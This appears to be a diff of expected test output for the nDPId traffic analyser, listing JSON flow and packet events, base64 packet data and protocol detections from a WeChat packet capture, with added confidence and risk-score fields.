 00709{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1416,"source":"wechat.pcap","alias":"nDPId-test","flow_id":70,"flow_packet_id":1,"flow_last_seen":1492167848542,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":243,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":243,"pkt_l4_len":209,"ts_msec":1492167848542,"pkt":"\/\/\/\/\/\/\/\/0CeIF3AECABFoADlWmgAAIARWkzAqAFkwKgB\/wCKAIoA0eSKEQ7\/A8CoAWQAigC7AAAgRUhFSkVQRkdFQkVPRU9FSkNORkFFRENBQ0FDQUNBQ0EAIEZIRVBGQ0VMRUhGQ0VQRkZGQUNBQ0FDQUNBQ0FDQUJPAP9TTUIlAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQAAIQAAAAAAAAAAAOgDAAAAAAAAAAAhAFYAAwABAAAAAgAyAFxNQUlMU0xPVFxCUk9XU0UADwCA\/AoAR0lPVkFOTkktUEMAAAAAAAYBAxIFAA8BVaoA"}
-00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1416,"source":"wechat.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167848542,"flow_last_seen":1492167848542,"flow_idle_time":180000,"flow_min_l4_payload_len":201,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":201,"flow_avg_l4_payload_len":201,"midstream":0,"ts_msec":1492167848542,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.255","src_port":138,"dst_port":138,"l4_proto":"udp","ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}}
+00762{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1416,"source":"wechat.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167848542,"flow_last_seen":1492167848542,"flow_idle_time":180000,"flow_min_l4_payload_len":201,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":201,"flow_avg_l4_payload_len":201,"midstream":0,"ts_msec":1492167848542,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.255","src_port":138,"dst_port":138,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}}
 00550{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1417,"source":"wechat.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167849769,"flow_last_seen":1492167849769,"flow_idle_time":120000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1492167849769,"l3_proto":"ip6","src_ip":"fe80::842:a3f3:a286:6c5b","dst_ip":"ff02::2","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3}
 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1417,"source":"wechat.pcap","alias":"nDPId-test","flow_id":71,"flow_packet_id":1,"flow_last_seen":1492167849769,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":70,"pkt_l4_len":16,"ts_msec":1492167849769,"pkt":"MzMAAAACuHgu4toHht1gCKryABA6\/\/6AAAAAAAAACEKj86KGbFv\/AgAAAAAAAAAAAAAAAAAChQD\/swAAAAABAbh4LuLaBw=="}
-00585{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1417,"source":"wechat.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167849769,"flow_last_seen":1492167849769,"flow_idle_time":120000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1492167849769,"l3_proto":"ip6","src_ip":"fe80::842:a3f3:a286:6c5b","dst_ip":"ff02::2","l4_proto":"icmp6","ndpi": {"proto":"ICMPV6","breed":"Acceptable","category":"Network"}}
+00611{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1417,"source":"wechat.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167849769,"flow_last_seen":1492167849769,"flow_idle_time":120000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1492167849769,"l3_proto":"ip6","src_ip":"fe80::842:a3f3:a286:6c5b","dst_ip":"ff02::2","l4_proto":"icmp6","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}}
 00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1418,"source":"wechat.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167851002,"flow_last_seen":1492167851002,"flow_idle_time":180000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":300,"midstream":0,"ts_msec":1492167851002,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00844{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1418,"source":"wechat.pcap","alias":"nDPId-test","flow_id":72,"flow_packet_id":1,"flow_last_seen":1492167851002,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":342,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":342,"pkt_l4_len":308,"ts_msec":1492167851002,"pkt":"\/\/\/\/\/\/\/\/uHgu4toHCABFAAFI3+EAAP8R2sMAAAAA\/\/\/\/\/wBEAEMBNOAUAQEGADPq6ioAAAAAAAAAAAAAAAAAAAAAAAAAALh4LuLaBwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABjglNjNQEDNwcBeQMGD3f8OQIF3D0HAbh4LuLaBzIEwKgBajMEAHanAAwOaVBob25lZGlNb25pY2H\/AAAAAAAA"}
-00696{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1418,"source":"wechat.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167851002,"flow_last_seen":1492167851002,"flow_idle_time":180000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":300,"midstream":0,"ts_msec":1492167851002,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","ndpi": {"proto":"DHCP","breed":"Acceptable","category":"Network"},"dhcp": {"hostname":"iphonedimonica","fingerprint":"1,121,3,6,15,119,252","class_ident":""}}
+00722{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1418,"source":"wechat.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167851002,"flow_last_seen":1492167851002,"flow_idle_time":180000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":300,"midstream":0,"ts_msec":1492167851002,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"},"dhcp": {"hostname":"iphonedimonica","fingerprint":"1,121,3,6,15,119,252","class_ident":""}}
 00538{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1419,"source":"wechat.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167851203,"flow_last_seen":1492167851203,"flow_idle_time":120000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"ts_msec":1492167851203,"l3_proto":"ip6","src_ip":"::","dst_ip":"ff02::1:ff86:6c5b","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3}
 00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1419,"source":"wechat.pcap","alias":"nDPId-test","flow_id":73,"flow_packet_id":1,"flow_last_seen":1492167851203,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"ts_msec":1492167851203,"pkt":"MzP\/hmxbuHgu4toHht1gAAAAACA6\/wAAAAAAAAAAAAAAAAAAAAD\/AgAAAAAAAAAAAAH\/hmxbhwDa5wAAAAD+gAAAAAAAAAhCo\/OihmxbDgE+iVJ12j4="}
-00573{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1419,"source":"wechat.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167851203,"flow_last_seen":1492167851203,"flow_idle_time":120000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"ts_msec":1492167851203,"l3_proto":"ip6","src_ip":"::","dst_ip":"ff02::1:ff86:6c5b","l4_proto":"icmp6","ndpi": {"proto":"ICMPV6","breed":"Acceptable","category":"Network"}}
+00599{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1419,"source":"wechat.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167851203,"flow_last_seen":1492167851203,"flow_idle_time":120000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"ts_msec":1492167851203,"l3_proto":"ip6","src_ip":"::","dst_ip":"ff02::1:ff86:6c5b","l4_proto":"icmp6","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}}
 00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1420,"source":"wechat.pcap","alias":"nDPId-test","flow_id":71,"flow_packet_id":2,"flow_last_seen":1492167851204,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":62,"pkt_l4_len":8,"ts_msec":1492167851204,"pkt":"MzMAAAACuHgu4toHht1gCL93AAg6\/\/6AAAAAAAAACEKj86KGbFv\/AgAAAAAAAAAAAAAAAAAChQDCHwAAAAA="}
 00551{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1421,"source":"wechat.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167852023,"flow_last_seen":1492167852023,"flow_idle_time":120000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"ts_msec":1492167852023,"l3_proto":"ip6","src_ip":"fe80::842:a3f3:a286:6c5b","dst_ip":"ff02::16","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3}
 00525{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1421,"source":"wechat.pcap","alias":"nDPId-test","flow_id":74,"flow_packet_id":1,"flow_last_seen":1492167852023,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":110,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":62,"pkt_len":110,"pkt_l4_len":48,"ts_msec":1492167852023,"pkt":"MzMAAAAWuHgu4toHht1gAAAAADgAAf6AAAAAAAAACEKj86KGbFv\/AgAAAAAAAAAAAAAAAAAWOgABAAUCAACPAPHlAAAAAgQAAAD\/AgAAAAAAAAAAAAL\/tFRbBAAAAP8CAAAAAAAAAAAAAf+GbFs="}
-00586{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1421,"source":"wechat.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167852023,"flow_last_seen":1492167852023,"flow_idle_time":120000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"ts_msec":1492167852023,"l3_proto":"ip6","src_ip":"fe80::842:a3f3:a286:6c5b","dst_ip":"ff02::16","l4_proto":"icmp6","ndpi": {"proto":"ICMPV6","breed":"Acceptable","category":"Network"}}
-00651{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1422,"source":"wechat.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"finished","flow_packets_processed":50,"flow_first_seen":1492167720101,"flow_last_seen":1492167748133,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2856,"flow_tot_l4_payload_len":27649,"flow_avg_l4_payload_len":552,"midstream":0,"ts_msec":1492167865541,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54119,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}}
-00650{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1422,"source":"wechat.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1492167720353,"flow_last_seen":1492167748129,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1688,"flow_tot_l4_payload_len":3531,"flow_avg_l4_payload_len":196,"midstream":0,"ts_msec":1492167865541,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54120,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}}
-00647{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":1422,"source":"wechat.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1492167765155,"flow_last_seen":1492167765432,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":349,"flow_tot_l4_payload_len":381,"flow_avg_l4_payload_len":190,"midstream":0,"ts_msec":1492167865541,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":60356,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS.WeChat","breed":"Fun","category":"Chat"}}
+00612{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1421,"source":"wechat.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167852023,"flow_last_seen":1492167852023,"flow_idle_time":120000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"ts_msec":1492167852023,"l3_proto":"ip6","src_ip":"fe80::842:a3f3:a286:6c5b","dst_ip":"ff02::16","l4_proto":"icmp6","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}}
+00677{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1422,"source":"wechat.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"finished","flow_packets_processed":50,"flow_first_seen":1492167720101,"flow_last_seen":1492167748133,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2856,"flow_tot_l4_payload_len":27649,"flow_avg_l4_payload_len":552,"midstream":0,"ts_msec":1492167865541,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54119,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}}
+00676{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1422,"source":"wechat.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1492167720353,"flow_last_seen":1492167748129,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1688,"flow_tot_l4_payload_len":3531,"flow_avg_l4_payload_len":196,"midstream":0,"ts_msec":1492167865541,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54120,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}}
+00673{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":1422,"source":"wechat.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1492167765155,"flow_last_seen":1492167765432,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":349,"flow_tot_l4_payload_len":381,"flow_avg_l4_payload_len":190,"midstream":0,"ts_msec":1492167865541,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":60356,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.WeChat","breed":"Fun","category":"Chat"}}
 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1426,"source":"wechat.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167865975,"flow_last_seen":1492167865975,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1492167865975,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58040,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1426,"source":"wechat.pcap","alias":"nDPId-test","flow_id":75,"flow_packet_id":1,"flow_last_seen":1492167865975,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1492167865975,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8cVZAAEAGp93AqAFny82Tq+K4AbvAQN+1AAAAAKACchCA5wAAAgQFtAQCCAoAMq7jAAAAAAEDAwc="}
 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1427,"source":"wechat.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167866226,"flow_last_seen":1492167866226,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1492167866226,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58041,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1427,"source":"wechat.pcap","alias":"nDPId-test","flow_id":76,"flow_packet_id":1,"flow_last_seen":1492167866226,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1492167866226,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8hOdAAEAGlEzAqAFny82Tq+K5AbuucSvFAAAAAKACchBGZwAAAgQFtAQCCAoAMq8iAAAAAAEDAwc="}
 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1428,"source":"wechat.pcap","alias":"nDPId-test","flow_id":75,"flow_packet_id":2,"flow_last_seen":1492167866243,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1492167866243,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAAC8GKZTLzZOrwKgBZwG74rhfZ1wawEDftqASN8iGUwAAAgQFoAQCCApFrzOuADKu4wEDAwc="}
 00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1429,"source":"wechat.pcap","alias":"nDPId-test","flow_id":75,"flow_packet_id":3,"flow_last_seen":1492167866243,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1492167866243,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0cVdAAEAGp+TAqAFny82Tq+K4AbvAQN+2X2dcG4AQAOXrqwAAAQEICgAyryZFrzOu"}
-00811{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1430,"source":"wechat.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167865975,"flow_last_seen":1492167866243,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"ts_msec":1492167866243,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58040,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
+00837{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1430,"source":"wechat.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167865975,"flow_last_seen":1492167866243,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"ts_msec":1492167866243,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58040,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1431,"source":"wechat.pcap","alias":"nDPId-test","flow_id":76,"flow_packet_id":2,"flow_last_seen":1492167866495,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1492167866495,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAAC8GKZTLzZOrwKgBZwG74rl6NAw+rnErxqASN8iAowAAAgQFoAQCCApFrzPtADKvIgEDAwc="}
 00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1432,"source":"wechat.pcap","alias":"nDPId-test","flow_id":76,"flow_packet_id":3,"flow_last_seen":1492167866495,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1492167866495,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0hOhAAEAGlFPAqAFny82Tq+K5AbuucSvGejQMP4AQAOXl+wAAAQEICgAyr2VFrzPt"}
-00868{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1434,"source":"wechat.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167865975,"flow_last_seen":1492167866514,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":277,"midstream":0,"ts_msec":1492167866514,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58040,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}}
-01402{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1436,"source":"wechat.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167865975,"flow_last_seen":1492167866514,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":3094,"flow_avg_l4_payload_len":386,"midstream":0,"ts_msec":1492167866514,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58040,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}}
-00811{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1478,"source":"wechat.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167866226,"flow_last_seen":1492167871050,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":39,"midstream":0,"ts_msec":1492167871050,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58041,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
-00868{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1484,"source":"wechat.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167866226,"flow_last_seen":1492167871323,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":208,"midstream":0,"ts_msec":1492167871323,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58041,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}}
